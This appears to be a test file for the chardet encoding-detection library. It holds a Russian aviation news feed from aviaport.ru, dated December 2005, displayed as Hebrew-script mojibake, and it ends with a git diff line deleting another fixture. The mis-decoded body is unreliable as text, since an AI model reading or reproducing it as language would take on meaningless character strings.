מהםמי חגוחהמי - http://www.aviaport.ru/news/2005/12/29/99256.html - ֲ הוךאבנו 1993 ד. ןונגי ןמכוע סמגונרטכ פנמםעמגמי במלבאנהטנמגשטך קועגונעמדמ ןמךמכוםט ׁף-34. ־ב ‎עמל ט הנףדטץ סמבעטץ נאססךאחגאוע דוםהטנוךעמנ ְֽֿ־ טל. ֲ.ֿ. ׳ךאכמגא ְ. ֱמבנרוג - Thu, 29 Dec 2005 16:27:00 +0300 - ֲ האכוךמל הוךאבנו 1993 דמהא סמגןאכט הגא סמבעט: םא ןמכטעטקוסךמי ךאנעו לטנא ןמגטכאס םמגא סףגונוםםא סענאםא ןמה םאחגאםטול ׀מססט, א גםףענט וו, ג סעמכטצו ׁטבטנט, ס כועםמדמ ןמכ חאגמהא טל. ֲ.ֿ. ׳ךאכמגא גחלכ ג ןונגי סגמי ןמכוע עמכךמ קעמ סמבנאםםי פנמםעמגמי במלבאנהטנמגשטך קועגונעמדמ ןמךמכוםט ׁף-34. ֳמסףהאנסעגמ ט מהטם טח סאלץ דנמחםץ חא גס‏ טסעמנט‏ גמוםםמי אגטאצטט סאלמכועמג נמהטכטס מהםמגנולוםםמ, ןמה מהםמי חגוחהמי. אך בףהעמ ֱמד בכאדמסכמגטכ ׀מססט‏, האנמגאג ג למלוםע וו נמזהוםט םובוסםמדמ חאשטעםטךא, ךמעמני בףהוע נאחגטגאעס ט נאסעט גלוסעו סמ סענאםמי.־ב ‎עמל ט מ הנףדטץ חםאלוםאעוכםץ סמבעטץ נמססטיסךמי טסעמנטט נאססךאחגאוע טץ םוןמסנוהסעגוםםי ףקאסעםטך, דוםונאכםי הטנוךעמנ ֽמגמסטבטנסךמדמ אגטאסענמטעוכםמדמ ןנמטחגמהסעגוםםמדמ מבתוהטםוםט טל. ֲ.ֿ. ׳ךאכמגא ְכוךסאםהנ ֱמבנרוג.- ֳכאגםל סמבעטול הכ נאבמעםטךמג ְֽֿ־ טל. ֲ.ֿ. ׳ךאכמגא ג ףץמהשול דמהף סעאכמ המכדמזהאםםמו גךכ‏קוםטו םארודמ םמגמדמ סאלמכועא ׁף-34 ג דמסףהאנסעגוםםי חאךאח. עמ חםאקטע, קעמ, םאקטםא ס םמגמדמ 2006 דמהא, חאגמה סםמגא בףהוע ןנמטחגמהטע סונטיםף‏ במוגף‏ עוץםטךף. ֿנטקול מבתול ןנמטחגמהסעגא דמה מע דמהא בףהףע נאסעט.ּ 12 כוע ןנטבכטזאכט ‎עמע הום, ןמסכוהמגאעוכםמ "סםמסטג" םא כועםץ טסןעאעוכםץ ןמכועאץ גמסול מןעםץ מבנאחצמג ׁף-34. ׀אבמע ןמ סמגונרוםסעגמגאםט‏ סאלמכועא םו מסעאםאגכטגאכטס האזו ג סאלו סכמזםו הכ חאגמהא גנולוםא, ךמדהא גסו ןנמטחגמהסעגמ חאלטנאכמ ט םו בכמ סנוהסעג םט םא חאנןכאעף, םט םא ‎כוךענמ‎םונדט‏. ֽו עמכךמ ‎ךמםמלטקוסךטו םוגחדמה ענובמגאכט מע ךמככוךעטגא ְֽֿ־ טל. ֲ. ֿ. ׳ךאכמגא למבטכטחאצטט גסוץ סטכ - ג נףךמגמהסעגו סענאם םו בכמ והטםמדמ לםוםט מ סףהבו ‎עמדמ ןנמוךעא. ֲמ גסךמל סכףקאו, המ ךמםצא 90-ץ םטךעמ םו למד סךאחאע מןנוהוכוםםמ, קעמ ׁף-34 בףהוע גךכ‏קום ג ןכאם ןונוגממנףזוםט ֲֲׁ, ט םאל מסעאגאכמס עמכךמ מהםמ: גונטע ג םארו הועטשו.ּ ףןמנםמ ןנמהמכזאכט נאבמעאע ט ןמבוהטכט. 13 אגדףסעא 2005 דמהא לטםטסענ מבמנמם ןנטםכ נורוםטו גךכ‏קטע ׁף-34 ג דמסףהאנסעגוםםי חאךאח, עול סאלל ןמהגוה טעמדמגף‏ קונעף ןמה נוחףכעאעאלט גסוץ טסןעאםטי - ט לארטם, ט כ‏הוי…ֲעמנל ןמ חםאקטלמסעט סמבעטול ףץמהשודמ דמהא ב םאחגאכ סמחהאםטו ֽמגמסטבטנסךמדמ פטכטאכא ְַ־ "ֳנאזהאםסךטו סאלמכוע ׁףץמדמ", ךמעמנמו מחםאלוםמגאכמ סמבמי ‏נטהטקוסךמו מפמנלכוםטו ןכאםמג סענמטעוכסעגא םמגוירודמ דנאזהאםסךמדמ סאלמכועא RRJ ("׀ארם ׀ודטמם ִזוע" - ׀ףססךטי ׀ודטמםאכםי ׁאלמכוע). עמע ןנמוךע ןנטחגאם ןמההונזאע סעאעףס םארוי סענאם ג דנאזהאםסךמל סאלמכועמסענמוםטט. ֽא םארול ןנוהןנטעטט ג ךממןונאצטט ס אגטאסענמטעוכלט טח מלסמלמכסךא-םא-ְלףנו בףהוע ןנמטחגמהטעס 95-לוסעםי גאנטאםע סאלמכועא. ּ עאךזו בףהול ףקאסעגמגאע ג סמחהאםטט 60- ט 75-לוסעםץ לארטם.ֿאססאזטנסךטי כאיםונ - הוכמ הכ ְֽֿ־ טל. ֲ.ֿ. ׳ךאכמגא םמגמו ט ןמ‎עמלף מעגועסעגוםםמו: ענףהמגמלף ךמככוךעטגף ןנוהסעמטע מסגמטע םמגו עוץםמכמדטט ט פאךעטקוסךט ןונויעט םא םמגי ףנמגום ןנמטחגמהסעגא. ׃זו םאקאכאס נוךמםסענףךצט סבמנמקםמדמ צוץא, סמחהאםמ םמגמו ןמהנאחהוכוםטו גסמךמסךמנמסעםמי מבנאבמעךט לועאככא, גםוהנ‏עס הנףדטו עוץםמכמדטקוסךטו םמגרוסעגא. ָעמדמל גסולף המכזום סעאע 2007 דמה, ךמדהא ןכאםטנףועס םאקאע כועםו טסןעאםט ןונגץ מבנאחצמג RRJ.ֽמגי סאלמכוע ףזו מזטהא‏ע ג נמססטיסךטץ אגטאצטמםםץ ךמלןאםטץ, ךמעמנו ףזו גנאזא‏ע דמעמגםמסע ןנטמבנוסעט םוסךמכךמ הוסעךמג טחהוכטי. ֿכאםטנףועס עאךזו ןנמהאזא םא ‎ךסןמנע: RRJ סןנמוךעטנמגאם ךאך סמגנולוםםי "וגנמןווצ", מעגוקא‏שטי גסול לוזהףםאנמהםל סעאםהאנעאל ט ענובמגאםטל. נמלו סונטיםמדמ ןנמטחגמהסעגא םמגוירודמ ׁף-34 ט חאגונרוםט ןמהדמעמגךט ןנמטחגמהסעגא סאלמכועא RRJ, םארו ןנוהןנטעטו ג בףהףשול דמהף זהףע םאנאסעא‏שטו מבתול למהונםטחאצטט סאלמכועא ׁף-24. ֲוה ֽמגמסטבטנסך בכ והטםסעגוםםמי ןנמטחגמהסעגוםםמי ןכמשאהךמי, מעךףהא גץמהטכט ‎עט ןנוךנאסםו לארטם גןכמע המ 1993 דמהא. ׁויקאס טץ ןמקעט עסקא ןמ גסולף לטנף, ט גסו מםט םףזהא‏עס ג למהונםטחאצטט, ךמעמנא סןמסמבםא חאלועםמ ןנומבנאחטע טץ במוגו ץאנאךעונטסעטךט. ׂאך קעמ ןמעמך חאגמך םא למהונםטחאצט‏ םארטץ ךנכאעץ ןטעמלצוג, סךמנוו גסודמ, בףהוע םאנאסעאע.־הםטל טח םאןנאגכוםטי הועוכםמסעט םארודמ חאגמהא, מ ךמעמנמל םוכח םו ףןמלםףע, בףהוע ְם-38. ִמסעאגרטיס םאל ג םאסכוהסעגמ מע הכטעוכםמדמ ט ןכמהמעגמנםמדמ סמענףהםטקוסעגא ס ־ֱ ְםעמםמגא (םםו חאנףבוזםמדמ), ‎עמע םובמכרמי דנףחמןאססאזטנסךטי סאלמכוע המךאחאכ סגמו ןנאגמ םא זטחם. ֲמ גסךמל סכףקאו, המסעאעמקםמ ףסעמיקטגי סןנמס םא םודמ הולמםסענטנף‏ע סענאם דמ-ֲמסעמקםמי ְחטט, דהו םארא םוןנטץמעכטגא לארטםא מךאחאכאס גןמכםו ןנטולכולמי הכ לוסעםץ אגטאכטםטי. ּ בףהול ןנמהמכזאע סמגונרוםסעגמגאע ‎עמע סאלמכוע, בףהףקט ףגונוםםלט, קעמ מם ןמענובףועס ט ג םארול ־עוקוסעגו.מםוקםמ זו, גסו המסעטזוםט ט גסו ןכאם םא בףהףשוו ְֽֿ־ טל. ֲ. ֿ. ׳ךאכמגא סמןנזום ס םארטל ךמככוךעטגמל, גועונאםאלט ט םמגלט ןמךמכוםטלט חאגמהקאם. ָל סענמטע בףהףשטו סאלמכוע. ֿמ‎עמלף ל בףהול ןנמהמכזאע םאנאשטגאע ףסטכט ןמ סמצטאכםמי חאשטעו םארטץ נאבמעםטךמג. ֲ םמבנו גנמסכא חאנןכאעא ף נאבמקטץ. ֲ בכטזאירוו גנול זהוע ןמגרוםטו גמחםאדנאזהוםט הכ הנףדטץ ךאעודמנטי נאבמעםטךמג מבתוהטםוםט. ֿמ לונו ‎ךמםמלטקוסךמדמ ףךנוןכוםט ןנוהןנטעט, ל םאלונום גונםףע גוס מבתול סמצטאכםץ דאנאםעטי הכ נאבמעםטךמג ְֽֿ־ טל. ֲ.ֿ. ׳ךאכמגא.ׁודמהם, ןמהגמה טעמדט ףץמהשודמ דמהא, למזםמ סךאחאע: חאהאקט, ךמעמנו ל סעאגטכט ןונוה סמבמי, גןמכםום ט ג ןנמטחגמהסעגוםםמל םאןנאגכוםטט, ט ג נורוםטט סמצטאכםץ ןנמבכול םא ןנוהןנטעטט. ֿנט ‎עמל םומבץמהטלמ ןמהקונךםףע, קעמ סעמשטו ןונוה ךמככוךעטגמל קךאכמגצוג חאהאקט םא 2006 דמה ןמ סגמולף ףנמגם‏, םאןנזוםםמסעט, מבתולף במכוו סכמזםו, קול נורוםםו ג עוקוםטו 2005 דמהא. ֽמ ףגונום: םארולף ךמככוךעטגף מםט ןמ ןכוקף, ל סןנאגטלס סמ גסולט ענףהםמסעלט ט ןנמבכולאלט! ֲ ךאםףם םמגמדמהםטץ ןנאחהםטךמג סונהוקםמ ןמחהנאגכ‏ גסוץ קךאכמגצוג ט זטעוכוי ֽמגמסטבטנסךא ס ֽמגל דמהמל. ־ע גסוי הףרט זוכא‏ ךנוןךמדמ חהמנמג, מןעטלטחלא, םוטססךאולמי ‎םונדטט ט גסקוסךטץ בכאד. ׳טסעמדמ םובא, כ‏בגט ט ףהאקט! - - - - - ֿנמפסמ‏חםי ךמלטעוע ְַ־ "ְגטאסעאנ-ֿׁ" ןמחאבמעטכס מ םמגמדמהםטץ ןמהאנךאץ ךמככוךעטגף - http://www.aviaport.ru/news/2005/12/29/99255.html - ֽאסשוםםף‏ ןנמדנאללף םמגמדמהםטץ ןנאחהםטךמג ןמהדמעמגטכ הכ ףכםמגסךטץ אגטאסענמטעוכוי ןנמפסמ‏חםי ךמלטעוע ְַ־ "ְגטאסעאנ-ֿׁ" - Thu, 29 Dec 2005 16:10:00 +0300 - ֽאסשוםםף‏ ןנמדנאללף םמגמדמהםטץ ןנאחהםטךמג ןמהדמעמגטכ הכ ףכםמגסךטץ אגטאסענמטעוכוי ןנמפסמ‏חםי ךמלטעוע ְַ־ "ְגטאסעאנ-ֿׁ". ׁטכאלט למכמהוזםמדמ ךמלטעועא ןנמפךמלא ןנמגוהום במכרמי ןנאחהםטקםי ךמםצונע. ֿנמפסמ‏חםו מנדאםטחאעמנ ןמבגאכט המלא ף ןוםסטמםונמג - גועונאםמג חאגמהא, טםגאכטהמג ענףהא. ִכ הועוי אגטאסענמטעוכוי מנדאםטחמגאם נךטו ןנוהסעאגכוםט ף םמגמדמהםוי וכךט. 70 םמגמדמהםטץ ןמהאנךמג בכמ ןונוהאםמ נובעאל ׳ונהאךכטםסךמדמ הועסךמדמ המלא, רופמל ךמעמנמדמ ְַ־ "ְגטאסעאנ-ֿׁ" גכועס ףזו לםמדמ כוע. ֲסודמ הכ הועוי נאבמעםטךמג חאגמהא ט קכוםמג ןנמפסמ‏חםמדמ ךמלטעועא ןמהדמעמגכוםמ במכוו 6000 ןמהאנךמג. - - - - - ְ‎נמפכמע ג 2005 דמהף - http://www.aviaport.ru/news/2005/12/29/99254.html - ִוןאנעאלוםע מבשוסעגוםםץ סגחוי ־ְ־ "ְ‎נמפכמע" ןנוהסעאגכוע סןטסמך סאלץ חםאקטלץ סמבעטי ג זטחםט ךמלןאםטט ג 2005 ד. - Thu, 29 Dec 2005 15:27:00 +0300 - ֲ ךאםףם םמגמדמהםטץ ןנאחהםטךמג ִוןאנעאלוםע מבשוסעגוםםץ סגחוי ןמהגמהטע טעמדט דמהא ט ןנוהסעאגכוע סןטסמך סאלץ חםאקטלץ סמבעטי ג זטחםט ךמלןאםטט ג 2005 דמהף.םגאנ - אגטאךמלןאםט המסעטדכא ףנמגם בוחמןאסםמסעט ןמכועמג 99,95%, קעמ גץמהטע ג סנוהםטי הטאןאחמם ןמ ךכאססטפטךאצטט ICAO (99,90 - 99,98%).װוגנאכ - אגטאךמלןאםט "ְ‎נמפכמע - נמססטיסךטו אגטאכטםטט" ט ְססמצטאצט ראץלאעםץ פוהונאצטי סמגלוסעםמ ס מלטעועמל ןמ עףנטחלף ֿנאגטעוכסעגא ּמסךג ןנמגוכט ראץלאעםי עףנםטנ "Aeroflot Open 2005" ס ןנטחמגל פמםהמל ג 175 עסק המככאנמג.ּאנע - ְ‎נמפכמע מסףשוסעגטכ ןונוץמה םא אגעמלאעטחטנמגאםםף‏ סטסעולף בנמםטנמגאםט ט ןנמהאזט בטכועמג ׁויבנ.ְןנוכ - אגטאךמלןאםט סעאכא כאףנואעמל םאצטמםאכםמי ןנולטט "ַמכמעא לאסךא - 2005" ג ןמקועםמי םמלטםאצטט "ַא ןמההונזךף עואענאכםמדמ טסךףססעגא ׀מססטט".ּאי - אךצט ְ‎נמפכמעא "בטכוי ֲוכטךמי ֿמבוה", ג נאלךאץ ךמעמנמי בוסןכאעםלט בטכועאלט הכ ןונוכועא ג דמנמהא ׀מססטיסךמי װוהונאצטט, ג סענאם ַאןאהםמי ֵגנמן, ֳֽׁ ט ֱאכעטט גמסןמכחמגאכטס במכוו ןעט ס ןמכמגטםמי עסק גועונאםמג - פנמםעמגטךמג, בגרטץ ףחםטךמג פארטחלא, בכמךאהםטךמג ֻוםטםדנאהא.ָ‏ם - מןנוהוכום דוםונאכםי ןמהנהקטך (פטנלא "Enka") ט םאקאעמ סענמטעוכסעגמ עונלטםאכא ״ונולועוגמ-3.ָ‏כ - ְ‎נמפכמע סעאכ ןמבוהטעוכול ןונגמדמ גסונמססטיסךמדמ ךמםךףנסא "ֻףקרא נמססטיסךא ךאהנמגא סכףזבא 2005 דמהא".ְגדףסע - מסעאםמגכום ןאנך ָכ-96, קעמ ןמענובמגאכמ מןונאעטגםמדמ לאםוגנא פכמעמל, סנמקםמי מןעטלטחאצטט לאנרנףעםמי סועט, ןנטגכוקוםט ֲׁ הנףדטץ אגטאךמלןאםטי. ֽוסלמענ םא סכמזםמסע סטעףאצטט ט ףבעךט גסו מבחאעוכסעגא ןונוה ןאססאזטנאלט ט ךכטוםעאלט גןמכםום.ׁוםעבנ - ְ‎נמפכמע ןמההונזאכ גסעאגךף "׀מססט!", ךמעמנף‏ ןמ סכףקא‏ 60-כועט ־־ֽ מעךנכ ג ֽ‏-ֹמנךו ןנוחטהוםע ׀װ ֲכאהטלטנ ֿףעטם.־ךעבנ - ְ‎נמפכמע ףסןורםמ ןנמרוכ אףהטעמנסךף‏ ןנמגונךף םא סממעגועסעגטו סעאםהאנעאל ‎ךסןכףאעאצטמםםמי בוחמןאסםמסעט IATA-IOSA.ֽמבנ - בנטדאהא במנעןנמגמהםטךמג ְ‎נמפכמעא ןנטםכא נמה םא במנעף סאלמכועא, סכוהמגאגרודמ טח ּמסךג ג ֻמס-ְםהזוכוס.ִוךאבנ - חאגונרום עוםהונ ט ןמהןטסאם ךמםענאךע םא ןמסעאגךף ְ‎נמפכמעף 30 סאלמכועמג RRJ.־ְ־ "ְ‎נמפכמע - נמססטיסךטו אגטאכטםטט" (׀ׁׂ: AFLT) - ךנףןםוירא נמססטיסךא אגטאךמלןאםט. 51% אךצטי ןנטםאהכוזטע דמסףהאנסעגף. ־סםמגאםא ג 1923 דמהף. מםענמכטנףוע ןמנהךא 11% גםףענוםםודמ ט 39% לוזהףםאנמהםמדמ נםךא אגטאןונוגמחמך ׀מססטט. ׳טסעא ןנטבכ חא 2004 ד. סמסעאגטכא 6330,143 לכם נףבכוי (219 לכם ‎ךג. המככ. ׁ״ְ). ֲץמהטע ג סןטסמך 25 גוהףשטץ אגטאךמלןאםטי לטנא ןמ פטםאםסמגל ןמךאחאעוכל (ןמ גונסטט ATW). ֲ 2004 דמהף ְ‎נמפכמע ןונוגוח 6,862 לכם ןאססאזטנמג. ֿאנך סמסעמטע טח 90 סאלמכועמג. ֱאחטנףועס ג ּמסךגו, א‎נמןמנע ״ונולועוגמ. ֿכאםטנףוע ך 2007 דמהף ןמסענמטע סמבסעגוםםי עונלטםאכ "״ונולועוגמ-3". - - - - - ׁאלמכוע-אלפטבט ֱו-103 ןנמטחגמהסעגא ְֽׂׂ טל. ֳ.ּ. ֱונטוגא ןמכףקטכ ךטעאיסךטי סונעטפטךאע - http://www.aviaport.ru/news/2005/12/29/99253.html - ׃ןנאגכוםטו דנאזהאםסךמי אגטאצטט טעא חאגונרטכמ ןנמצוסס סונעטפטךאצטט כודךמדמ לםמדמצוכוגמדמ סאלמכועא-אלפטבטט ֱו-103 - Thu, 29 Dec 2005 15:22:00 +0300 - ׃ןנאגכוםטו דנאזהאםסךמי אגטאצטט טעא (CAAC) חאגונרטכמ ןנמצוסס סונעטפטךאצטט כודךמדמ לםמדמצוכוגמדמ סאלמכועא-אלפטבטט ֱו-103.ֱו-103 ןמכףקטכ ךטעאיסךטי סונעטפטךאע עטןא ¹ VTC173A, קעמ ןמחגמכוע םאקאע ןמסעאגךט סאלמכועמג ןונגל חאךאחקטךאל ג טעאיסךמי ֽאנמהםמי ׀וסןףבכטךו.ׁאלמכוע-אלפטבט ֱו-103 נאחנאבמעאם ג סממעגועסעגטט ס ענובמגאםטלט אגטאצטמםםץ ןנאגטכ ְֿ-23, FAR-23, JAR-23 ט טלווע נמססטיסךטי סונעטפטךאע עטןא םמנלאכםמי ךאעודמנטט. ֲ 2003 דמהף מם סונעטפטצטנמגאם ןמ םמנלאל װוהונאכםמי אגטאצטמםםמי אהלטםטסענאצטט ׁ״ְ, ג 2005 דמהף ןמכףקטכ סונעטפטךאע כועםמי דמהםמסעט ג ֱנאחטכטט. ֲ םאסעמשוו גנול ןנמץמהע ןונודמגמנ מ ןמסעאגךאץ סאלמכועמג-אלפטבטי ט הנףדטל חאנףבוזםל חאךאחקטךאל. - - - - - "ָכ‏רטם װטםאםס" םאלונום ןנמהאע ג טעאי גמסול ָכ-96-400 - http://www.aviaport.ru/news/2005/12/29/99252.html - ָװ נאססקטעגאוע ןנמהאע מהםמי טח ךטעאיסךטץ אגטאךמלןאםטי גמסול דנףחמגץ ָכ-96-400. ֱאחמגא צוםא עאךמדמ סאלמכועא סמסעאגכוע מךמכמ $50 לכם. - Thu, 29 Dec 2005 14:41:00 +0300 - ֻטחטםדמגא ךמלןאםט "ָכ‏רטם װטםאםס" (ָװ) נאססקטעגאוע ןנמהאע מהםמי טח ךטעאיסךטץ אגטאךמלןאםטי גמסול דנףחמגץ ָכ-96-400, סךאחאכ Reuters דוםהטנוךעמנ ְכוךסאםהנ ׀ףבצמג.ֱאחמגא צוםא עאךמדמ סאלמכועא סמסעאגכוע מךמכמ $50 לכם. ֲ ‎עמל דמהף נמססטיסךטו גכאסעט םא םוךמעמנמו גנול חאןנועטכט ‎ךסןכףאעאצט‏ ָכ-96 טח-חא נהא הופוךעמג, גךכ‏קא עמנלמחםף‏ סטסעולף, םאןמלטםאוע Reuters."ֿנמנאבאעגאועס סהוכךא םא ןמסעאגךף ָכ-96-400 ג טעאי. ֵסע מהטם חאךאחקטך", - סךאחאכ מם, םו םאחגאג ךמלןאםט‏. ׀ףבצמג המבאגטכ, קעמ ָװ נאססקטעגאוע םא ןמעוםצטאכםץ ןמךףןאעוכוי ג ָנאםו ט ׁטנטט, םמ םו ןנטגוכ ןמהנמבםמסעט.מלןאםט "ָכ‏רטם װטםאםס מ." (ָװ) בכא סמחהאםא ג 1999 דמהף ןמ טםטצטאעטגו ְגטאצטמםםמדמ ךמלןכוךסא ׁ. ֲ. ָכ‏רטםא. ־סםמגםמי גטה הועוכםמסעט ָװ - פטםאםסמגי ט מןונאצטמםםי כטחטםד אגטאצטמםםמי עוץםטךט נמססטיסךמדמ ןנמטחגמהסעגא. מלןאםט חאגטכא מ סובו ךאך מ סענאעודטקוסךמל טםגוסעמנו םאטבמכוו ךמםךףנוםעמסןמסמבםץ ןנוהןנטעטי מענאסכט. ֲ םאסעמשוו גנול חאםטלאוע ןנמקםו ןמחטצטט ג מענאסכט ךאך מהםמ טח גוהףשטץ סןוצטאכטחטנמגאםםץ אגטאכטחטםדמגץ ןנוהןנטעטי ׀מססטט, כטהטנף‏שוו ןמ מבתולף סמבסעגוםםמדמ ךאןטעאכא ט גוכטקטםו ןמנעפוכ חאךאחמג. ׁ למלוםעא סגמודמ מבנאחמגאםט ָװ ספמנלטנמגאכא ןאךוע חאךאחמג םא ךנףןםוירטץ אגטאסענמטעוכםץ חאגמהאץ ׀מססטט, בכאדמהאנ ךמעמנל בכמ ןמסענמוםמ 8 םמגץ האכםולאדטסענאכםץ סאלמכועמג סולויסעגא ָכ-96 םא ֲמנמםוזסךמל אךצטמםונםמל סאלמכועמסענמטעוכםמל מבתוהטםוםטט (ְֲׁ־) ט 5 סאלמכועמג סולויסעגא ׂף-204 םא ־ְ־ "ְגטאסעאנ" (׃כםמגסך). ֲ םאסעמשטי למלוםע ָװ פמנלטנףוע ןאךוע סעאנעמגמדמ חאךאחא נמססטיסךמ-ףךנאטםסךטץ סאלמכועמג סולויסעגא ְם-148, סונטיםמו ןנמטחגמהסעגמ ךמעמנץ ג 2005 דמהף םאכאזוםמ םא ְֲׁ־ ט טְֳַ "ְגטאםע" (טוג). ֿמ סמסעמםט‏ םא 1 מךעבנ 2005 דמהא סעמטלמסע אךעטגמג ָװ מצוםטגאועס ג 12,386 לכנה נףבכוי ($427 לכם). מלןאםט ךמםענמכטנףועס דמסףהאנסעגמל (38% אךצטי ף ׀מסטלףשוסעגא ט מךמכמ 16% - ג סמבסעגוםםמסעט דמסףהאנסעגוםםמדמ ֲםור‎ךמםמלבאםךא). ֵשו 36% נאסןמנזאועס ֽאצטמםאכםא נוחונגםא ךמנןמנאצט, לוםוהזלוםע ךמםענמכטנףוע 7% אךצטי. - - - - - ױאנךמגסךמו אגטאסענמטעוכםמו ןנוהןנטעטו דמעמגמ ףכאהטע ךמםפכטךע ס ְֽׂ "ְםעמםמג" - http://www.aviaport.ru/news/2005/12/29/99251.html - ױְֳֿֿ דמעמגמ ןנוהכמזטע ְֽׂ "ְםעמםמג" לטנמגף‏. ־ב ‎עמל ךמננוסןמםהוםעף ֻ²ְֱֳ³חםוס²םפמנל ג ‎ךסךכ‏חטגםמל טםעונג‏ סממבשטכ הטנוךעמנ ןנוהסעאגטעוכסעגא ױְֳֿֿ ג טוגו ִ. ּוכםטך - Thu, 29 Dec 2005 14:35:00 +0300 - ױאנךמגסךמו דמסףהאנסעגוםםמו אגטאצטמםםמו ןנמטחגמהסעגוםםמו ןנוהןנטעטו (ױְֳֿֿ) דמעמגמ ןנוהכמזטע ְֽׂ "ְםעמםמג" לטנמגף‏. ־ב ‎עמל ךמננוסןמםהוםעף ֻ²ְֱֳ³חםוס²םפמנל ג ‎ךסךכ‏חטגםמל טםעונג‏ סממבשטכ הטנוךעמנ ןנוהסעאגטעוכסעגא ױְֳֿֿ ג טוגו ִלטענטי ּוכםטך.ֿמ ודמ סכמגאל, טחםאקאכםמ ג סףה ןמהאכ ְֽׂ "ְםעמםמג" ס טסךמל םא גמחלושוםטו למנאכםמדמ ףשונבא ג נאחלונו 90 לכם.דנם. "ׁ ‎עמדמ למלוםעא םאקאכטס ןנמצוסס, טסךט, אנבטענאזםו סףה... ֽא סודמהםרםטי למלוםע ױאנךמגסךטי אגטאחאגמה דמעמג סוסע חא סעמכ ןונודמגמנמג ט ןנוהכמזטע לטנמגף‏", - מעלועטכ ִ.ּוכםטך.ֲ עמ זו גנול מם מעלועטכ, קעמ םולםמדמ נאםוו "לטנמגמו סמדכארוםטו" לוזהף ןנוהןנטעטלט בכמ המסעטדםףעמ, םמ ןמסכו "לטנמגמי" ְֽׂ ןמהאכ םא ױְֳֿֿ מקונוהםמי טסך. "ׂאךטל מבנאחמל ךמללוםעטנמגאע ‎עמ סמבעטו לםו המגמכםמ חאענףהםטעוכםמ - סןנמסטעו ף םטץ. ׳עמ זו ךאסאועס ןמחטצטט ױאנךמגסךמדמ אגטאחאגמהא.... ֵסכט םאל גהגטדא‏ע טסךט, ס ךמעמנלט ל םו סמדכאסם, עמ ל גהגטדאול גסענוקםו טסךט", - סממבשטכ ִ.ּוכםטך.ֽאןמלםטל, סףהובםו נאחבטנאעוכסעגא לוזהף ְֽׂ ט ױְֳֿֿ הכעס ףזו במכוו ןמכףדמהא. ֿמסכוהםטל נורוםטול ןמ האםםמלף גמןנמסף גכועס נורוםטו טוגסךמדמ אןוככצטמםםמדמ ץמחיסעגוםםמדמ סףהא, ךמעמני 9 הוךאבנ 2005 דמהא מסעאגטכ בוח ףהמגכועגמנוםט אןוככצטמםםף‏ זאכמבף ְֽׂ "ְםעמםמג" םא נורוםטו ױמחיסעגוםםמדמ סףהא דמנמהא טוגא מע 19 סוםעבנ 2005 דמהא, ךמעמנל ךמלןאםטט בכמ מעךאחאםמ ג ףהמגכועגמנוםטט טסךא ך ױְֳֿֿ םא סףללף 61,15 לכם. דנם. - - - - - ׁמענףהםטךט סכףזב אגטאצטמםםמי בוחמןאסםמסעט א‎נמןמנעא ׂמכלאקוגמ טחתכט ף ךףנסאםעא ־לסךמדמ טםזוםונםמ-עאםךמגמדמ טםסעטעףעא לטםף - http://www.aviaport.ru/news/2005/12/29/99250.html - ֲ א‎נמןמנעף "ׂמכלאקוגמ" ןנט ןנמץמזהוםטט ןנוהןמכועםמדמ המסלמענא םא נויס ֽמגמסטבטנסך - ּטנםי ף ןאססאזטנא מבםאנףזוםא לטםא - Thu, 29 Dec 2005 14:32:00 +0300 - 28 הוךאבנ ג 15.25 לוסעםמדמ גנולוםט ךףנסאםע 3 ךףנסא ְכוךסאםהנ ִתךמג בכ חאהונזאם טםסןוךעמנמל סכףזב אגטאצטמםםמי בוחמןאסםמסעט ןנט ןנמץמזהוםטט ןנוהןמכועםמדמ המסלמענא םא נויס ֽמגמסטבטנסך - ּטנםי.ּטםא מךאחאכאס ףקובםמי. ׁמענףהםטךאלט כטםויםמדמ מעהוכא לטכטצטט א‎נמןמנעא סמסעאגכום ןנמעמךמכ, לאךוע לטם טחתע, סעףהוםע מעןנאגכום ןמ לוסעף זטעוכסעגא ג ןמסוכמך ֿוכוהףי נוסןףבכטךט ׁאץא.ֿמ סכמגאל, חאהונזאםםמדמ, לאךוע לטם מסעאכס ף םודמ ג סףלךו ןמסכו ףקוםטי. ְ מעבג ג מעןףסך מם ןנמסעמ םו ןנמגונטכ סמהונזטלמו סףלךט.P.S. ֽוסלמענ םא מקום לאכוםךטו נאחלונ (לועאככטקוסךא קאסע ןנוהסעאגכוע סמבמי ןמכף‏ ענףבךף הטאלוענמל גסודמ 6 לל ט הכטםמי 2,5 סל.), לטםא בכא מבםאנףזוםא ג ןנמצוססו המסלמענא םא נוםעדוםמ-עוכוגטחטמםםמי ףסעאםמגךו "HEIMANN". - - - - - AZAL ןמכףקטע במכוו $8 לכם. סענאץמגץ גןכאע חא ןמעונןוגרטי ךנףרוםטו סאלמכוע ְם-140-100 - http://www.aviaport.ru/news/2005/12/29/99249.html - ֲ סממעגועסעגטט סמ סענאץמגל ןמכטסמל חא ןמעונןוגרטי ךאעאסענמפף בכטח ֱאךף סאלמכוע ְם-140-100 ןנמטחגמהסעגא ױְֳֿֿ AZAL ןמכףקטע $8,5 לכם. - Thu, 29 Dec 2005 14:20:00 +0300 - ֲ סממעגועסעגטט סמ סענאץמגל ןמכטסמל חא ןמעונןוגרטי ךאעאסענמפף בכטח ֱאךף 23 הוךאבנ סאלמכוע ְם-140-100 ןנמטחגמהסעגא ױאנךמגסךמדמ דמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ןנוהןנטעט ֳ AZAL ןמכףקטע $8,5 לכם. ־ב ‎עמל, ךאך ןונוהאוע "ׂנוםה", סממבשטכ 28 הוךאבנ םא ןנוסס-ךמםפונוםצטט דכאגא ֳ AZAL ִזאץאםדטנ ְסךונמג.ֿמ ודמ סכמגאל, ךאזהא סול ןמדטברטץ ןאססאזטנמג ןמכףקטע ןמ 115 לכם לאםאעמג, טכט $25 עס. "ֿמלטלמ ‎עמדמ, ג סגחט ס ןמעונוי ךמנלטכצא, ג קאסעםמסעט, וסכט ף ןמדטברטץ ןאססאזטנמג בכט םוסמגונרוםםמכועםטו הועט, ל בףהוע טל גןכאקטגאע סנוהסעגא ג נאחלונו סנוהםוי חאנאבמעםמי ןכאע םא ךאזהמדמ נובוםךא",- סךאחאכ מם.ִז. ְסךונמג מעלועטכ, קעמ גןכאע ךמלןוםסאצטי למדףע בע םאקאע ס פוגנאכ 2006 דמהא. ֳכאגא ֳ עאךזו מעלועטכ, קעמ ךאזהא סול קכוםמג ‎ךטןאזא ןמכףקטע $10 עס. ג ךאקוסעגו אגטאצטמםםמי סענאץמגךט. - - - - - diff --git a/chardet/tests/windows-1251-cyrillic/blog.mlmaster.com.xml b/chardet/tests/windows-1251-cyrillic/blog.mlmaster.com.xml deleted file mode 100644 index 